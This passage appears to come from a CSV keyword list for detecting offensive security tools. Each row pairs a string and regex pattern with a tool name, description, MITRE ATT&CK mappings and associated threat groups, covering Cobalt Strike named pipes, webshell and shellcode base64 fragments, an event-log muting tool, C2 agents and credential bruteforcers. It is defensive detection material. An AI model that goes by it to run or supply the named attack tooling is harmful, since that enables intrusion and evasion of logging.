"*ZnVuY3Rpb24gRG9udXQtTG9hZGVyIHtwYXJhbSgkcHJvY2Vzc19pZCwkZG9udXRmaWx*",".{0,1000}ZnVuY3Rpb24gRG9udXQtTG9hZGVyIHtwYXJhbSgkcHJvY2Vzc19pZCwkZG9udXRmaWx.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","0","#base64","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","63481" "*ZnVuY3Rpb24gRGxsLUxvYWRlciB7CiAgICBwYXJhbShbc3dpdGNoXSRzbWIsIFtzd2l0Y*",".{0,1000}ZnVuY3Rpb24gRGxsLUxvYWRlciB7CiAgICBwYXJhbShbc3dpdGNoXSRzbWIsIFtzd2l0Y.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","0","#base64","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","63482" "*ZnVuY3Rpb24gSW52b2tlLUJpbmFyeSB7cGFyYW0oJGFyZykKICAgICRoZWxwPUAi*",".{0,1000}ZnVuY3Rpb24gSW52b2tlLUJpbmFyeSB7cGFyYW0oJGFyZykKICAgICRoZWxwPUAi.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","0","#base64","N/A","10","3","261","51","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z","63483" "*ZnVuY3Rpb24gSW52b2tlLVNoZWxsY29kZQ0K*",".{0,1000}ZnVuY3Rpb24gSW52b2tlLVNoZWxsY29kZQ0K.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and 
functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an 'all in one' Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some of). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#base64","N/A","9","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","63484" "*zoom1.msi.gpg*",".{0,1000}zoom1\.msi\.gpg.{0,1000}","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tool","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A","63489" "*zoom2.dll.gpg*",".{0,1000}zoom2\.dll\.gpg.{0,1000}","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tool","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A","63490" "*zs5460/portscan*",".{0,1000}zs5460\/portscan.{0,1000}","offensive_tool_keyword","portscan","A simple TCP and UDP portscanner written in Go","T1595 - T1596 - T1594","TA0007 - 
TA0009","N/A","N/A","Discovery","https://github.com/zs5460/portscan","1","1","N/A","N/A","N/A","1","14","4","2022-11-11T09:26:47Z","2019-06-04T09:00:00Z","63507" "*zsh_executor *",".{0,1000}zsh_executor\s.{0,1000}","offensive_tool_keyword","mythic","mythic C2 agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/freyja/","1","0","N/A","N/A","10","10","54","13","2024-10-29T17:32:07Z","2022-09-28T17:20:04Z","63508" "*zSI9xSN3Ob0gBCYaOnwey7whAH4kwX0gBCYa*",".{0,1000}zSI9xSN3Ob0gBCYaOnwey7whAH4kwX0gBCYa.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#base64","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","63509" "*zSI9xWleO7AbADEmAD0kxX4fACJezmMeyt==*",".{0,1000}zSI9xWleO7AbADEmAD0kxX4fACJezmMeyt\=\=.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#base64","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","63510" "*zsploit-1.txt*",".{0,1000}zsploit\-1\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","63511" "*zsploit-2.txt*",".{0,1000}zsploit\-2\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","63512" "*ztgrace*changeme*",".{0,1000}ztgrace.{0,1000}changeme.{0,1000}","offensive_tool_keyword","changeme","A default credential scanner.","T1110 - T1114 - T1112 - T1056","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/ztgrace/changeme","1","1","N/A","N/A","N/A","10","1478","251","2021-12-26T10:20:11Z","2016-03-11T17:10:34Z","63513" "*ZxKmz4hXp6XKmTPg9lzgYxXN4sFr2pzo*",".{0,1000}ZxKmz4hXp6XKmTPg9lzgYxXN4sFr2pzo.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","0","#base64","N/A","7","1","59","13","2024-04-23T02:47:28Z","2020-11-20T22:22:48Z","63514" "*ZXMARGVidWdnaW5nTW9kZXMAZ2V0X1JlZmVyZW5jZWRBc3NlbWJsaWVzAEdldElQR2xvYmFsUHJv*",".{0,1000}ZXMARGVidWdnaW5nTW9kZXMAZ2V0X1JlZmVyZW5jZWRBc3NlbWJsaWVzAEdldElQR2xvYmFsUHJv.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","#base64","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","63515" 
"*ZXZpbG1vcnR5Om11bHRpdmVyc2U=*",".{0,1000}ZXZpbG1vcnR5Om11bHRpdmVyc2U\=.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1572 - T1071.001 - T1105","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","#base64","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","63516" "*ZXZpZGVuY2UuZmJpLmdvdg==*",".{0,1000}ZXZpZGVuY2UuZmJpLmdvdg\=\=.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","#base64","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","63517" "*zyn3rgy/LdapRelayScan*",".{0,1000}zyn3rgy\/LdapRelayScan.{0,1000}","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1557","TA0001 - TA0006","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","1","N/A","N/A","8","5","492","70","2024-11-19T21:11:53Z","2022-01-16T06:50:44Z","63518" "*zzzteph/weakpass*",".{0,1000}zzzteph\/weakpass.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","63519" "./beef","\.\/beef","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","0","#linux","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","63520" "./radare *","\.\/radare\s.{0,1000}","offensive_tool_keyword","RadareEye","Tool for especially scanning nearby devices and execute a given command on its own system while the target device comes in range.","T1125 - T1071 - T1105 - T1057","TA0010 - TA0002 - TA0007","N/A","N/A","Lateral Movement","https://github.com/souravbaghz/RadareEye","1","0","#linux","N/A","N/A","4","364","49","2021-12-11T06:16:37Z","2021-01-07T04:52:58Z","63521" "\\demoagent_11","\\\\demoagent_11","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt 
- Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#namedpipe","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A","63522" "\\demoagent_22","\\\\demoagent_22","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - 
Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#namedpipe","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A","63523" "\\DserNamePipe*","\\\\DserNamePipe.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#namedpipe","pipe names (sysmon EID 17 
- 18)","10","10","N/A","N/A","N/A","N/A","63524" "\\f4c3*","\\\\f4c3.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#namedpipe","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A","63525" "\\f53f*","\\\\f53f.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics 
and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#namedpipe","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A","63526" "\\fullduplex_*","\\\\fullduplex_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#namedpipe","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A","63527" "\\interprocess_*","\\\\interprocess_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 
- T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#namedpipe","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A","63528" "\\mojo_*","\\\\mojo_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - 
T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#namedpipe","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A","63529" "\\msagent_*","\\\\msagent_.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - 
BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#namedpipe","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A","63530" "\\MsFteWds*","\\\\MsFteWds.{0,1000}","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 